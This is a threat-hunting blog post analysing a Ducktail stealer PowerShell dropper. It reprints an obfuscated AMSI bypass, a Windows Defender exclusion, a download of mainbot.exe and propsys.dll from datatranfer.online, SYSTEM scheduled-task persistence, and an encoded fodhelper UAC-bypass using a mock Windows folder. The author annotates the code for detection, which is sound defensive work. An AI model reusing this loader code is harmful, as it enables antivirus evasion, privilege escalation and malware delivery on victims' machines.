$zyamzl=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dGVtLkNvcmU="));
$sbufr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lz"));
$epxxi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("b25QdWJsaWMsU3RhdGlj"));
$mjlcobsv=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tg=="));
$ygxmj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bXNpSW5pdEZhaWxlZA=="));
$pkthe=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YQ=="));
$yyijbukto=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM="));
$dwlwa=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lz"));
$mwceo=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("UnRabmw1ZEdkaVoyUnJZaUE5SUNSMGNuVmw="));
$hhhwloob=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SkdkbmIy"));
Invoke-Expression
([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($hhhwloob
+ $mwceo)))); $ffbxdoueycxyauct = [Ref].Assembly.GetType(($dwlwa +
$yyijbukto)).GetField(($pkthe + $ygxmj),($mjlcobsv + $epxxi));
$ffbxdoueycxyauct.SetValue($null,$ggodmfyytgbgdkb);
[Reflection.Assembly]::LoadWithPartialName(($sbufr + $zyamzl)).GetType(($dlfjuvi
+ $anfmwtwcbi)).GetField(($ahlqtwa + $qchnys),($cnabzidj +
$pwckunaunc)).SetValue([Ref].Assembly.GetType(($csgnlg +
$piualxi)).GetField(($qjmjs + $ukqyefbmi),($mjlcobsv +
$epxxi)).GetValue($null),0); Invoke-Expression
([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($lyulayuejj
+ $jfsbsnefd))));

In summary, we have a new payload + the same fuss. Why change if it works? In this case, the code is:

function Wait-OnMutex {
    param (
        [parameter(Mandatory=$true)]
        [string]$MutexId
    )
try {
        $MutexInstance = New-Object System.Threading.Mutex -ArgumentList 'false', $MutexId
        while (-not $MutexInstance.WaitOne(1000)) {
            Start-Sleep -m 500
        }
        return $MutexInstance
    } catch [System.Threading.AbandonedMutexException] {
        $MutexInstance = New-Object System.Threading.Mutex -ArgumentList 'false', $MutexId
        return Wait-OnMutex -MutexId $MutexId
    }
}
Write-Host "WAting";
$MutexInstance = Wait-OnMutex -MutexId "RUNNING";
Write-Host "running";
# Check if Windows Defender is installed and enabled
$windowsDefender = Get-WmiObject -Namespace "Root\\SecurityCenter2" -Class "AntivirusProduct" | Where-Object { $_.displayName -eq "Windows Defender" }
# Check if any other antivirus software is installed
$otherAntivirus = Get-WmiObject -Namespace "Root\\SecurityCenter2" -Class "AntivirusProduct" | Where-Object { $_.displayName -ne "Windows Defender" }
$isRunning = $false;
if ($windowsDefender -ne $null) {
    $isRunning = $true;
    Add-MpPreference -ExclusionPath "C:\\Windows\\Temp";
} elseif ($otherAntivirus -ne $null) {
    
} else {
    $isRunning = $true;
}
 
if($isRunning -eq $false) {
    exit;
}
function Download-FileWithRetry {
    param (
        [string]$url,
        [string]$destination,
        [int]$maxRetries = 30,
        [int]$retryDelayInSeconds = 5
    )
    $retryCount = 0
    $downloadSucceeded = $false
    while ($retryCount -lt $maxRetries -and -not $downloadSucceeded) {
        try {
            # Check if the destination file already exists
            if (Test-Path -Path $destination -PathType Leaf) {
                
                try{
                    Remove-Item -Path $destination;
                }
                catch{
                    Write-Host "File already exists at $destination. Download canceled.";
                    return;
                }
                
            }
            # Use WebClient to download the file
            $webClient = New-Object System.Net.WebClient
            $webClient.DownloadFile($url, $destination)
            # Check if the download was successful
            if (Test-Path -Path $destination -PathType Leaf) {
                Write-Host "Download completed: $destination"
                $downloadSucceeded = $true
            } else {
                Write-Host "Download failed: $url"
            }
        }
        catch [System.Net.WebException] {
            # Handle internet errors
            Write-Host "Internet error: $($_.Exception.Message)"
        }
        catch {
            # Handle other errors
            Write-Host "Error: $($_.Exception.Message)"
        }
        # If the download failed, increment the retry count and wait before retrying
        if (-not $downloadSucceeded) {
            $retryCount++
            if ($retryCount -lt $maxRetries) {
                Write-Host "Retrying download in $retryDelayInSeconds seconds..."
                Start-Sleep -Seconds $retryDelayInSeconds
            }
        }
    }
    if (-not $downloadSucceeded) {
        Write-Host "Download failed after $maxRetries retries."
    }
}
Write-Host "Sleep 10s";
Start-Sleep -Seconds 10;
Write-Host "Download bot";
Download-FileWithRetry -url "<http://datatranfer.online/file/t/mainbot.exe>" -destination "C:\\Windows\\Temp\\svczHost.exe";
Write-Host "add task";
$action = New-ScheduledTaskAction -Execute "C:\\Windows\\Temp\\svczHost.exe" -Argument "chubedan datatranfer.online";
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest;
$trigger = New-ScheduledTaskTrigger -AtLogOn;
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;
Unregister-ScheduledTask -TaskName "zServicechubedan" -Confirm:$false;
Register-ScheduledTask -Action $action -Principal $principal -Trigger $trigger -Settings $settings -TaskName "zServicechubedan" -Description "Windows helper";
Write-Host "run task";
Start-ScheduledTask -TaskName "zServicechubedan";
Write-Host "ket thuc";
$MutexInstance.ReleaseMutex();

I will divide this analysis into 2 parts, as this component is of eminent defense evasion. First, we will have an investigation through the WMI database of what the corporate AV is. If it’s defender we will force it to load an exclusion with “Add-MpPreference -ExclusionPath”:

# Check if Windows Defender is installed and enabled
$windowsDefender = Get-WmiObject -Namespace "Root\\\\SecurityCenter2" -Class "AntivirusProduct" | Where-Object { $_.displayName -eq "Windows Defender" }
# Check if any other antivirus software is installed
$otherAntivirus = Get-WmiObject -Namespace "Root\\\\SecurityCenter2" -Class "AntivirusProduct" | Where-Object { $_.displayName -ne "Windows Defender" }
$isRunning = $false;
if ($windowsDefender -ne $null) {
    $isRunning = $true;
    **Add-MpPreference -ExclusionPath "C:\\\\Windows\\\\Temp";**

If it is another AV, as we said in spanish “having studied”. In reality, jokes aside, many AVs store their exclusions in the Windows registry, but, even if you modify that registry, in the next policy update, that change will disappear. It was something that i checked years ago in a McAfee, so it may not apply to all equally. If you have more info on this, I read you in comments.

On the other hand, the code has a second important part. I comment on it with ### in the code:

### Download of a very suspicious payload ###
Download-FileWithRetry -url "<http://datatranfer.online/file/t/mainbot.exe>" -destination "C:\\\\Windows\\\\Temp\\\\svczHost.exe"; ### it saves it as a name very similar to the windows binary "svchost.exe", key in many system operations. This is a first-rate hacker *masquerading*.###

### Persistence through scheduled task ###
Write-Host "add task";
$action = New-ScheduledTaskAction -Execute "C:\\\\Windows\\\\Temp\\\\svczHost.exe" -Argument "chubedan datatranfer.online";

### Of course, scheduled task where we slip a privilege escalation, to the user with the most privileges in the system, even more than an "admin", the SYSTEM###
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest;
$trigger = New-ScheduledTaskTrigger -AtLogOn;
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;

### Strange name to not attract attention ###
Unregister-ScheduledTask -TaskName "zServicechubedan" -Confirm:$false;
Register-ScheduledTask -Action $action -Principal $principal -Trigger $trigger -Settings $settings -TaskName "zServicechubedan" -Description "Windows helper"; ### But yes, the description, that seems something harmless ###
Write-Host "run task";
Start-ScheduledTask -TaskName "zServicechubedan";

As we can see, this code is a real gem. Here is a virustotal collection on Ducktail, where you can find a copy of the “mainbot-svcZhost”, to take a look without having to download it. To continue with this part of the analysis, I will take this sample.

Without going into an extensive analysis, which would be enough for another whole post, I would like to show you this subtle detail that can be seen in the sandbox results:

Changing PowerShell.exe to pwsh.exe (PowerShell version 6), may seem trivial, but it is actually a significant change, becauuuuseee many manual detection rules could be affected. However, the execution is exactly the same. That’s why it’s important to make the rules “well”, when we implement a use case, not only taking what we see, but everything that can be run.

Returning to our analysis, let’s go to the next part of the code:

else
    {
        Write-Host "bypass uac run cmd";
        Start-process "powershell.exe"  -ArgumentList ("-EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAYwBtAGQALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAIgAvAGMAIABtAGsAZABpAHIAIAAiACIAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAIgAiACAAJgAgAG0AawBkAGkAcgAgACIAIgBDADoAXABXAGkAbgBkAG8AdwBzACAAXABTAHkAcwB0AGUAbQAzADIAXAAiACIAIAAmACAAYwBvAHAAeQAgACIAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAZgBvAGQAaABlAGwAcABlAHIALgBlAHgAZQAiACIAIAAiACIAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAUwB5AHMAdABlAG0AMwAyAFwAIgAiACIAKQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAgAC0AVwBhAGkAdAA7AA==") -WindowStyle Hidden  -Wait;

Here’s the result, and I tell you, our attacker is an old school, not only for the detail of the execution:

Start-Process "cmd.exe" -ArgumentList ("/c mkdir ""C:\\\\Windows \\\\"" & mkdir ""C:\\\\Windows \\\\System32\\\\"" & copy ""C:\\\\Windows\\\\System32\\\\**fodhelper.exe**"" ""C:**\\\\Windows \\\\**System32\\\\""") -WindowStyle Hidden  -Wait;

Here we have two techniques, one of dog, the space after Windows when copying fodhelper, which means that this folder is not “Windows”, it’s “Windows “. Do you see the difference? Another masquerading. The second one is not the Windows folder, but anyone who sees it will think it is.

It also copies fodhelper. Copy binaries from system32 to other locations, another classic.

Here is an explanation why he uses fodhelper. Look at the date, and you will understand why our attacker looks like an old schooler.

The next piece of code is the “final”. Final for this post. And it’s an “important” one:

while($true){
            Write-Host "download file";
            Download-FileFromUrl -Url "<http://datatranfer.online/api/filedata/dll/7339ea9b8c9c2b7ccd2b7f7977456b41>" -Destination "C:\\Windows \\System32\\propsys.dll";
            Write-Host "Start Temp";
            $command = "/c ""C:\\Windows \\System32\\fodhelper.exe""";
            Write-Host $command;
            $cmdName = "cmd.exe";
            Write-Host  $cmdName;
            $mtx_randomMutex= New-Object System.Threading.Mutex($false, "MyRandomMutex");
            $mtx_randomMutex.WaitOne(0);
            Start-Sleep -Seconds 1;
            write-host "start process, wait stop";
            Start-Process $cmdName -ArgumentList ($command) -WindowStyle Hidden;
            Start-Sleep -Seconds 2;

In this sample, based on the results of the datatranfer.online domain in virustotal, many conclusions can be drawn. Such as that this sample can be downloaded without using the PowerShell user-agent. This does not allow to download it from any place, for example, virustotal.

Here you can see the result.

As you will see, when VT treats something as a URL, it does not leave it quite fine if it has a file, as in this case, so I recommend in these cases, to analyze the body in the “details” section. In my case, since I have already given it, it appears as “go to analysis”:

Virustotal information from URL

Now we have our file better analyzed. I will leave you with a couple of details that I have been able to extract. In my case, I downloaded the sandbox PCAP which is only available in the paid version of VT. And I have seen a network connection, which is not visible to the naked eye (CAPE already tells us that there is something there that it has not seen):

PCAP from virustotal CAPE sandbox

On the other hand, by means of the “file written”, I have arrived at this. Could it be a coincidence? I will read you in the comments.

And finally, I think that our payload is still doing its thing, stretching the chewing gum, to complicate the detection by diversifying into different processes:

Here is an analysis of eSentire, where they talk about another part of Ducktail, the one that talks about RDP Wrapped, another feature of Ducktail that we have not seen in this analysis, but that is common in some of the samples that I have analyzed.

Also, from the files related to this sample, some Ransomware sample is seen, which without going into the in-depth intelligence part, gives food for thought….

Happy Hunting!

Threat Hunting
Threat Detection
Ducktail Stealer
Cyber Threat Hunting
Cybersecurity

--

--

Cristóbal Martínez

Written by Cristóbal Martínez

20 Followers

Creator of The Hunter's Framework, the best framework for Threat Hunting. Cyber Threat Hunter and cybersecurity technian and consultant.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams